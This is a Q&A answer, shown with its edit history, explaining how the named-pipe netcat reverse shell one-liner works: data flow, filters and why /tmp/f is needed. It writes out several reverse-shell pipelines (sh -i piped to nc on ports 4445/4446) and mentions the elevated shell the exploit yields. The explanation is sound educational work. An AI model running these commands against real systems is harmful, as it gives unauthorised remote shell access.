Q&A

Post History

+4 −0
Q&A: Reverse shell with named pipe and netcat


posted 10mo ago by Kamil Maciorowski · edited 10mo ago by Kamil Maciorowski

Answer
#3: Post edited by Kamil Maciorowski · 2023-06-28T19:52:54Z (10 months ago)
I'm not sure which exact fragment, functionality or aspect is problematic to you. Here I will make points (paragraphs) about what I used to struggle to understand, or about what I suspect may be not-quite-easy to understand.

Some of the paragraphs below are important for understanding later paragraphs; they are not all standalone or independent.
---

### Continuity

Your literal reading of the command is right, but it does not stress continuity. While "create a new named pipe" is a one-time action, every "write from this to that" should rather be "start and keep writing …". That is, if a listening netcat server exists when the `nc` in the pipeline tries to connect to it, then `cat`, `sh` and `nc` will not only run and write; they will keep running and writing.
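The one-time nature of `mkfifo` can be seen in isolation: it just creates a special file that then persists, waiting for the long-running readers and writers. A small sketch (using `mktemp -u` only to pick an unused name):

```shell
# mkfifo is a one-shot action: it creates a named pipe (FIFO) on disk.
# The long-running part is whatever later reads from / writes to it.
f=$(mktemp -u)          # pick an unused temporary name (name only, no file yet)
mkfifo "$f"             # one-time: the named pipe now exists
ls -l "$f" | cut -c1    # file type character: "p" means named pipe
rm "$f"
```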
---

### Useless use of `cat`

`cat` in your code is just a "relay"; it's not really needed. The pipeline after `mkfifo` may as well be:

    /bin/sh -i </tmp/f 2>&1 | nc 127.0.0.1 4445 >/tmp/f

This is the part designed to keep running. `cat` only makes the pipeline longer; it doesn't affect the data flow.
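The "relay" claim is easy to check with any pipeline: inserting an extra `cat` changes nothing about the data that flows through. A toy check, unrelated to the exploit itself:

```shell
# With and without the extra cat "relay", the data is identical.
with_cat=$(printf 'abc\n' | cat | tr 'a' 'A')
without=$(printf 'abc\n' | tr 'a' 'A')
[ "$with_cat" = "$without" ] && echo identical
# prints: identical
```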
---

### Filters and such

The concept is general. Pipes in a shell allow us to chain programs like this:

    program1 <input | program2 | … | programN >output

(where any `program` may take command line arguments, but for brevity I used no arguments). I prefer a slightly different arrangement of tokens:

    <input program1 | program2 | … | programN >output

Here, by reading from left to right, we expect data to flow from `input` through `program1`, `program2`, …, `programN` to `output`.

Programs designed to work like this are called *filters*, especially if they work on textual data line by line and apply some modification to their input before printing it as output. Example programs that are filters, along with example (i.e. not exhaustive lists of) modifications they can apply:

- `cat` – no modification, identity filter
- `tr` – replacement or deletion of characters
- `grep` – deletion of non-matching lines
- `sed` – replacement or deletion of whole phrases
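For instance, such filters can be chained, each stage transforming the stream it receives. A toy pipeline with made-up data:

```shell
# cat passes lines through, tr rewrites characters, grep drops non-matching lines.
printf 'snake oil\nsnake\n' | cat | tr 'a' 'A' | grep 'oil'
# prints: snAke oil
```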
---

### Are `sh` and `nc` filters?

The pipeline in question may be written as:

    </tmp/f /bin/sh -i 2>&1 | nc 127.0.0.1 4445 >/tmp/f

and it looks like a pipeline that chains two filters; or "filters". My intuition is that `sh` and `nc` are filters only in the broadest meaning of "filter": they consume input and print some output, but they do not really *transform* input into output per se.

Take `sh -i` on its own, which in an interactive shell is equivalent to `</dev/tty sh -i >/dev/tty 2>/dev/tty`. If you feed it the string `date\n` (where `\n` denotes the newline character), then "it" will respond with the output of the `date` command. The output will come from `date`, not from `sh`; and it won't be a transformation of the input stream, but in some sense a reaction to it. Therefore I don't call `sh` a filter. You can use it to run a real filter (e.g. `grep …`) and then the rest of the input stream will be filtered, but by itself `sh` is not a filter.
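This "reaction, not transformation" behaviour can be observed directly; here with `echo` instead of `date`, so the output is deterministic:

```shell
# sh does not transform the line "echo reacted"; it runs it,
# and the output comes from the command, not from sh itself.
printf 'echo reacted\n' | sh
# prints: reacted
```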
It's similar with `nc`. What it reads as input emerges as output from the other `nc` (`nc -l`) you run, and the input of the other `nc` emerges as output from the first `nc`. You can imagine a connected `nc`+`nc -l` pair as two `cat`s, i.e. two identity filters; the difference is that each of these "cats" sits between the input and output of different processes. I don't call `nc` a filter because its output may or may not be its filtered input; that depends entirely on how data flows from and to the other `nc`. If `nc` happens to modify data like some filter would, it's only because there is an actual filter (or filters) connected to the other `nc`.
---

### Is there a loop?

You wrote:

> I have a rough intuition that the steps above create an input/output loop between netcat and the shell

I wouldn't call it a loop. It's true that what you write to a named pipe (like `/tmp/f`) you can read back from it, so the pipeline below *looks* like a loop, since (as a whole) it reads from where it writes to; but there are "loose ends" in the data flow. The pipeline:

    </tmp/f /bin/sh -i 2>&1 | nc 127.0.0.1 4445 >/tmp/f

is really something like this:

```
                   your screen -<-. (nc -l) .-<- your keyboard
                                  |         |    START HERE
                                  '---..----'
                                      ||          network connection
    .- sh or whatever sh runs -.   .--''--.
    |                          |   |      |
.->-'           (sh)           '->-' (nc) '->-.
|    .----------------->--------.             |
|    |       alleged loop       |             |   actual flow
|    '-----------------<--------'             |
'--------------------- /tmp/f -<-------------'
```

The alleged loop breaks when you realize `nc` does not connect its input to its output; it's not a filter. It's like a pair of uni-directional connections to the other `nc` (`nc -l`). The other `nc` reads from your keyboard and prints to your screen; these are the loose ends in our data flow.

Not only are your keyboard and your screen loose ends; `sh` plus its descendants are not necessarily a filter either. This means we can observe two logically separate channels:

1. your keyboard -> `nc -l` -> `nc` -> `/tmp/f` -> `sh` or whatever `sh` runs,
2. `sh` or whatever `sh` runs -> `nc` -> `nc -l` -> your screen.

Ultimately these are:

1. your keyboard -> … -> `sh` or whatever `sh` runs,
2. `sh` or whatever `sh` runs -> … -> your screen.

as if you ran `sh -i` in a terminal (well, almost\*). `sh -i` alone in the exploit couldn't access your terminal; the job of the `nc`s and `/tmp/f` is to connect this `sh -i` to your terminal.

Even if what `sh` runs at the moment happens to be a filter, there will be no loop, because between your screen and your keyboard there is you, and you don't retype what you see (possibly with some modifications, like a filter); right?
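The "what you write to a named pipe you can read from it" premise can be tried in isolation (a sketch; note the background writer blocks until a reader opens the pipe):

```shell
# A named pipe hands data from a writer to a reader; it is not a loop by itself.
f=$(mktemp -u)
mkfifo "$f"
printf 'hello\n' >"$f" &    # writer: blocks until someone opens the pipe for reading
cat "$f"                    # reader: prints: hello
wait                        # reap the background writer
rm "$f"
```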
---

<sup>\* Almost, because genuinely running a process in a terminal makes the terminal a controlling terminal for the process. This has useful consequences (e.g. the ability to generate SIGINT upon <kbd>Ctrl</kbd>+<kbd>c</kbd>). The shell you get from the exploit will behave *not entirely* like `sh -i` run in a terminal. This will not limit what you can do to the system; it will be an elevated shell nevertheless.</sup>
---

### Why is `/tmp/f` needed?

`/tmp/f` is not strictly necessary. To communicate with `sh -i` you could run:

    </dev/null nc 127.0.0.1 4446 | /bin/sh -i 2>&1 | nc 127.0.0.1 4445 >/dev/null

and run `nc -lvnp 4445` *and* `nc -lvnp 4446` to create one connection for receiving the output of `sh` (and its descendants) and one connection for supplying input. The easiest way would be to use two terminals (terminal emulators), but then you would observe output in a terminal different from the one you use to give input.

It so happens that a single connection is bi-directional, so using a single `nc`+`nc -l` pair for both input and output, like you did, is convenient. But to use it this way you need to pipe from `nc` to `sh` and from the same `sh` back to the same `nc`. You cannot do this straightforwardly with ad-hoc piping alone. There are coprocesses, but they are not portable and are more or less cumbersome (depending on the shell). Using a named pipe, and creating what at first glance *looks* like a loop in the data flow, is a simple and convenient solution.
#2: Post edited by Kamil Maciorowski · 2023-06-27T12:42:20Z (10 months ago)
#1: Initial revision by user avatar Kamil Maciorowski‭ · 2023-06-27T12:21:02Z (10 months ago)
I'm not sure which exact fragment, functionality or aspect is problematic to you. Here I will make points (paragraphs) about what I used to struggle to understand, or about what I suspect may be not-quite-easy to understand.

Some of the below paragraphs are important for understanding later paragraphs; they are not all standalone or independent.

---

### Continuity

Your literal reading of the command is right, but it does not stress continuity. While "create a new named pipe" is a one-time action, all "write from this to that" should rather be "start and keep writing …". I mean if there is a listening netcat server when `nc` in the pipe tries to connect to it then `cat`, `sh` and `nc` will not only run and write, they will keep running and writing.

---

### Useless use of `cat`

`cat` in your code is just a "relay", it's not really needed. The pipeline after `mkfifo` may as well be:

    /bin/sh -i </tmp/f 2>&1 | nc 127.0.0.1 4445 >/tmp/f

This is the part designed to keep running. `cat` would only make the pipeline longer, but it wouldn't affect data flow.

---

### Filters and such

The concept is general. Pipes in a shell allow us to chain programs like this:

    program1 <input | program2 | … | programN >output

(where any `program` may take command line arguments, but for brevity I used no arguments). I prefer a slightly different arrangement of tokens:

    <input program1 | program2 | … | programN >output

Here, by reading from left to right, we expect data to flow from `input` through `program1`, `program2`, …, `programN` to `output`.

Programs designed to work like this are called *filters*, especially if they work on textual data line-by-line and apply some modifications to their input before printing it as output. Example programs that are filters along with example (i.e. not exhaustive lists of) modifications they can apply:

- `cat` – no modification, identity filter
- `tr` – replacement or deletion of characters
- `grep` – deletion of non-matching lines
- `sed` – replacement or deletion of whole phrases
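A small chain of such filters (the sample text and the particular transformations are mine, picked only to show each stage doing its job):

```shell
result=$(
  printf 'one fish\ntwo fish\nred cat\n' |
    grep fish |             # deletion of non-matching lines
    tr a-z A-Z |            # replacement of characters
    sed 's/FISH/SHARK/'     # replacement of a whole phrase
)
echo "$result"   # prints: ONE SHARK and TWO SHARK
```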

---

### Are `sh` and `nc` filters?

The pipeline in question may be written as:

    </tmp/f /bin/sh -i 2>&1 | nc 127.0.0.1 4445 >/tmp/f

and it looks like a pipeline that chains two filters; or "filters". My intuition is that `sh` and `nc` are filters only in the broadest sense of the word: they consume input and print some output, but they do not really *transform* input into output per se.

Take `sh -i` alone, which in an interactive shell is equivalent to `</dev/tty sh -i >/dev/tty 2>/dev/tty`. If you feed it the string `date\n` (where `\n` denotes the newline character), then "it" will respond with the output of the `date` command. The output will come from `date`, not from `sh`; and it won't be a transformation of the input stream, in some sense it will be a reaction to it. Therefore I don't call `sh` a filter. You can use it to run a real filter (e.g. `grep …`), and then the rest of the input stream will be filtered; but by itself `sh` is not a filter.
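The contrast can be shown with one input line (my own sample text): a real filter transforms the line, while `sh` executes it, so `sh`'s output comes from the command it runs.

```shell
line='echo reaction, not transformation'

filtered=$(printf '%s\n' "$line" | tr a-z A-Z)   # a real filter: transforms the text
reacted=$(printf '%s\n' "$line" | sh)            # sh: runs the text as a command

echo "$filtered"   # prints: ECHO REACTION, NOT TRANSFORMATION
echo "$reacted"    # prints: reaction, not transformation
```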

It's similar with `nc`. What it reads as input emerges as output from this other `nc` (`nc -l`) you run; and the input of the other `nc` emerges as output from the first `nc`. The output of the `nc` in the pipe may or may not be its filtered input. It depends on how data flows from and to the other `nc`.

---

### Is there a loop?

You wrote:

> I have a rough intuition that the steps above create an input/output loop between netcat and the shell

I wouldn't call it a loop. It's true that whatever you write to a named pipe (like `/tmp/f`) can be read back from it, so the pipeline below *looks* like a loop, as it (as a whole) reads from the place it writes to; but there are "loose ends" in the data flow. The pipeline:

    </tmp/f /bin/sh -i 2>&1 | nc 127.0.0.1 4445 >/tmp/f

is really something like this:

```
                   your screen -<-. (nc -l) .-<- your keyboard
                                  |         |    START HERE
                                  '---..----'
                                      || network connection
    .- sh or whatever sh runs -.   .--''--.
    |                          |   |      |
.->-'            (sh)          '->-' (nc) '->-.
|              .----------------->--------.   |
|              |       alleged loop       |   | actual flow
|              '-----------------<--------'   |
'----------------------- /tmp/f -<------------'
```

Not only are your keyboard and your screen loose ends; `sh` plus its descendants are not necessarily a filter, either. This means we can observe two logically separate channels:

1. your keyboard -> `nc -l` -> `nc` -> `/tmp/f` -> `sh` or whatever `sh` runs,
0. `sh` or whatever `sh` runs -> `nc` -> `nc -l` -> your screen.

Ultimately these are:

1. your keyboard -> … -> `sh` or whatever `sh` runs,
0. `sh` or whatever `sh` runs -> … -> your screen.

as if you ran `sh -i` in a terminal (well, almost\*). `sh -i` alone in the exploit couldn't access your terminal; the job of the `nc`s and `/tmp/f` is to connect this `sh -i` to your terminal.

Even if what `sh` runs at the moment happens to be a filter, there will be no loop, because between your screen and your keyboard there is you, and you don't retype what you see (possibly with some modifications, like a filter would); right?
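The "what you write you can read back" property of a named pipe can also be seen in isolation (filenames are my own; this is just the fifo, with no `nc` or `sh` involved):

```shell
dir=$(mktemp -d)
mkfifo "$dir/f"

echo hello >"$dir/f" &       # the writer blocks until a reader opens the pipe
readback=$(cat "$dir/f")     # reads back exactly what was written

wait
echo "$readback"             # prints: hello
rm -r "$dir"
```

The fifo forwards data from its writer to its reader; by itself it creates no loop, it is the surrounding processes that decide where the two ends lead.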

---

<sup>\* Almost, because genuinely running a process in a terminal makes the terminal a controlling terminal for the process. This has useful consequences (e.g. the ability to generate SIGINT upon <kbd>Ctrl</kbd>+<kbd>c</kbd>). The shell you get from the exploit will behave *not entirely* like `sh -i` run in a terminal. This will not limit what you can do to the system; it will be an elevated shell nevertheless.</sup>

---

### Why is `/tmp/f` needed?

`/tmp/f` is not necessary. To communicate with `sh -i` you could do:

    </dev/null nc 127.0.0.1 4446 | /bin/sh -i 2>&1 | nc 127.0.0.1 4445 >/dev/null

and run `nc -lvnp 4445` *and* `nc -lvnp 4446` to create one connection for receiving output of `sh` (and its descendants) and one connection for supplying input. The easiest way would be to use two terminals (terminal emulators), but then you would observe output in a terminal different from the one you would use to give input.

It so happens that a single connection is bidirectional. Using a single `nc`+`nc -l` pair for both input and output, like you did, is convenient. But to use it as such you need to pipe from `nc` to `sh` and from the same `sh` back to the same `nc`, and you cannot straightforwardly do this with ad-hoc piping alone. There are coprocesses, but they are not portable and are more or less cumbersome (depending on the shell). Using a named pipe and creating what at first glance *looks* like a loop in the data flow is a simple and convenient solution.
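A hypothetical local stand-in for this plumbing (no network at all; the two fifos and the sample command are mine): two named pipes give `sh` a separate input channel and output channel, playing the roles of the two directions of the single `nc` connection.

```shell
dir=$(mktemp -d)
mkfifo "$dir/in" "$dir/out"

sh <"$dir/in" >"$dir/out" 2>&1 &     # the shell to be controlled

echo 'echo hi from controlled sh' >"$dir/in"   # "send" it a command
reply=$(cat "$dir/out")                        # "receive" its output

wait
echo "$reply"    # prints: hi from controlled sh
rm -r "$dir"
```

The exploit's single `/tmp/f` plus the bidirectional `nc` connection accomplish the same pairing of channels with one fifo instead of two.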